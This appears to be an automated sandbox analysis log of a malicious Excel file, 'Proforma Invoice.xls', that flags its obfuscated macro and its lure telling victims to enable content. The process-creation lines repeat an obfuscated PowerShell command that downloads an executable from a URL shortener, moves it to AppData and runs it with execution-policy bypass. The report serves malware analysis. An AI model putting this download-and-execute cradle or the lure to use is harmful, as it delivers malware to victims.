Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
Source: powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-112763434-1
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.hu/docs/
Source: powershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.net/docs
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Document image extraction number: 0Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 0Screenshot OCR: Enable Content"
Source: Document image extraction number: 1Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 1Screenshot OCR: Enable Content"
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Proforma Invoice.xlsInitial sample: EXEC
Found obfuscated Excel 4.0 MacroShow sources
Source: Proforma Invoice.xlsInitial sample: High usage of CHAR() function: 37
Source: Proforma Invoice.xlsOLE, VBA macro line: Sub auto_open()
Source: Proforma Invoice.xlsOLE indicator, VBA macros: true
Source: powershell.exe, 00000007.00000002.2125698867.000000001CD10000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal88.expl.evad.winXLS@13/11@2/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\A4FE0000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRED89.tmpJump to behavior
Source: Proforma Invoice.xlsOLE indicator, Workbook stream: true
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..................#.....#.................F.......#.......F.......A.....`IC........v.....................KJ.....................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j......................T.............}..v....h.......0.................j.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../..................j....0.j...............T.............}..v....0.......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../..................j......................T.............}..v....h.......0.................j.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;.......e.r.r.o.r. .o.c.c.u.r.r.e.d. .o.n. .a. .s.e.n.d..."."...........0.................j.....6.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;..................j....X.................T.............}..v............0.................j.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.6.T.............}..v............0.................j.....".......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G..................j......................T.............}..v.... .......0.................j.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S..................j....0.j...............T.............}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S..................j......................T.............}..v.... .......0.................j.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._.......y./.Z.h.q.U.H.1.O.'.,.'.v.x...e.x.e.'.).........}..v....8.......0.................j.....(.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._..................j......................T.............}..v....p.......0.................j.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k..................j....0.j...............T.............}..v....0.......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k..................j......................T.............}..v....h.......0.................j.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w..................j....0.j...............T.............}..v............0.......................f.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w..................j....X.................T.............}..v............0.................j.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j....0.j...............T.............}..v....h.......0.................j.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0...............................H1...... .........T.............}..v............ .................j.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..=.....................#.................F...............F.......A.....`IC........v.....................KJ.......=.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j....x.................T.............}..v............0.................n.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../.......n.o.t. .e.x.i.s.t.................T.............}..v.....!......0...............h.n.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../..................j....@"................T.............}..v....."......0.................n.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.8.T.............}..v.....&......0...............h.n.....".......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;..................j.....'................T.............}..v.....(......0.................n.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..=.............y=.v....G...............B..j......n...............T.............}..v............0.................=.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G..................j....h/................T.............}..v...../......0.................n.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..=.............y=.v....S...............B..j......n...............T.............}..v.....6......0.................=.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S..................j....h7................T.............}..v.....7......0.................n.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..=.............y=.v...._...............B..j......n...............T.............}..v.....=......0.................=.....\.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._..................j.....=................T.............}..v....@>......0.................n.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..=.............y=.v....k...............B..j......n...............T.............}..v.....E......0.................=.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k..................j.....E................T.............}..v....@F......0.................n.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w....... . . .t.e.m.C.o.m.m.a.n.d.........T.............}..v.....I......0...............h.n.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w..................j.....J................T.............}..v.....K......0.................n.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......B..j......n...............T.............}..v.....N......0...............h.n.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....`O................T.............}..v.....O......0.................n.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#.................F...............F.......A.....`IC........v.....................KJ.....................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............7..j.....I................T.............}..v....8J......0...............H.X.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../..................j......X...............T.............}..v.....Q......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../...............7..j.....Q................T.............}..v....8R......0...............H.X.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;..................j......X...............T.............}..v....xW......0.......................l.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;...............7..j....0X................T.............}..v.....X......0...............H.X.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.T.............}..v.....\......0.................X.....".......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G...............7..j....x]................T.............}..v.....]......0...............H.X.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S..................j......X...............T.............}..v....8c......0.......................l.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S...............7..j.....c................T.............}..v....pd......0...............H.X.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._..................j......X...............T.............}..v....8k......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._...............7..j.....k................T.............}..v....pl......0...............H.X.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k....... . . .F.o.u.n.d.E.x.c.e.p.t.i.o.n.T.............}..v.....p......0.................X.....".......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k...............7..j....8q................T.............}..v.....q......0...............H.X.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w..................j......X...............T.............}..v.....v......0.......................l.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w...............7..j.....w................T.............}..v....0x......0...............H.X.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j......X...............T.............}..v.....{......0.................X.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................7..j....x|................T.............}..v.....|......0...............H.X.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Proforma Invoice.xlsVirustotal: Detection: 14%
Source: Proforma Invoice.xlsReversingLabs: Detection: 20%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exeJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000007.00000002.2118363331.0000000002B57000.00000004.00000040.sdmp, powershell.exe, 0000000A.00000002.2165611235.0000000002317000.00000004.00000040.sdmp
Source: Binary string: tomation.pdb source: powershell.exe, 00000007.00000002.2118363331.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.2165611235.0000000002317000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdbFz source: powershell.exe, 00000007.00000002.2118359521.0000000002B54000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbem.M source: powershell.exe, 00000007.00000002.2118363331.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000007.00000002.2118363331.0000000002B57000.00000004.00000040.sdmp, powershell.exe, 0000000A.00000002.2165611235.0000000002317000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBB source: powershell.exe, 0000000A.00000002.2165611235.0000000002317000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000007.00000002.2118363331.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000007.00000002.2118363331.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000007.00000002.2118363331.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000007.00000002.2118363331.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000007.00000002.2118363331.0000000002B57000.00000004.00000040.sdmp, powershell.exe, 0000000A.00000002.2165611235.0000000002317000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000007.00000002.2118363331.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.2165611235.0000000002317000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000007.00000002.2118363331.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2118363331.0000000002B57000.00000004.00000040.sdmp, powershell.exe, 0000000A.00000002.2165611235.0000000002317000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2118298362.0000000002A60000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2154366038.0000000002990000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Obfuscated command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exeJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
